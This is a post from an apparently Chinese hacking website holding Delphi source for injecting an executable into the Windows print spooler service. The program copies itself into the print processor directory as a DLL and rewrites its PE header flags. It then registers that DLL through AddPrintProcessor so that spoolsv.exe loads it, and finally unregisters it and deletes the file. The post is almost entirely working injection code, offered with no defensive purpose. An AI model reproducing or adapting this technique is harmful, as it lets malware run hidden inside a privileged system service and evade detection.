RSS订阅 | 匿名投稿
您的位置:网站首页 > 黑客 > 正文

delphi Using Windows Print Spooler To Run Your File

作者:admin 来源: 日期:2011/8/18 13:46:36 人气: 标签:

 
program PrintInject;

uses
Windows, Classes, WinSpool, SysUtils;

function PathFindFileNameA(szFilePath:PChar):PChar; stdcall; external 'shlwapi.dll';

procedure MainProc();
var
szBuff: array[0..255] of Char;
dwSize: DWORD;
pProc: Pointer;
dwTick: DWORD;
szPrint: PChar;
szFilePath: array[0..511] of Char;
hFile: DWORD;
dwNull: DWORD;
IDH: TImageDosHeader;
INH: TImageNtHeaders;
const
szformat: PChar = '%08X';
begin
GetModuleFileName(0, szFilePath, 512);
if PathFindFileNameA(szFilePath) <> 'spoolsv.exe' then
begin
if GetPrintProcessorDirectory(nil, nil, 1, @szBuff[0], $104, dwSize) <> FALSE then
begin
lstrcat(szBuff, '\randomdll.dll');
CopyFileA(szFilePath, szBuff, FALSE);
hFile := CreateFile(szBuff, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
if hFile <> INVALID_HANDLE_VALUE then
begin
SetFilePointer(hFile, 0, nil, FILE_BEGIN);
ReadFile(hFile, IDH, 64, dwNull, nil);
if IDH.e_magic = IMAGE_DOS_SIGNATURE then
begin
SetFilePointer(hFile, IDH._lfanew, nil, FILE_BEGIN);
ReadFile(hFile, INH, 248, dwNull, nil);
if INH.Signature = IMAGE_NT_SIGNATURE then
begin
INH.FileHeader.Characteristics := $A18E;
SetFilePointer(hFile, IDH._lfanew, nil, FILE_BEGIN);
WriteFile(hFile, INH, 248, dwNull, nil);
end;
end;
CloseHandle(hFile);
end;
pProc := GetProcAddress(GetModuleHandle('ntdll.dll'), '_snprintf');
dwTick := GetTickCount;
GetMem(szPrint, 256);
asm
push eax
push ecx
push edx
push dwTick
push szformat
push $14
push szPrint
call pProc
pop edx
pop ecx
pop eax
end;
AddPrintProcessor(nil, nil, PChar(PathFindFileNameA(szBuff)), szPrint);
DeletePrintProcessor(nil, nil, szPrint);
DeleteFileA(szBuff);
FreeMem(szPrint, 256);
end
else
MessageBox(0, 'Get dir failed', nil, 0);
end
else
MessageBox(0, 'Yup in spoolsv.exe', 'Success', 0);
end;

begin
MainProc;
end.


读完这篇文章后,您心情如何?
0
0
0
0
0
0
0
0
本文网址: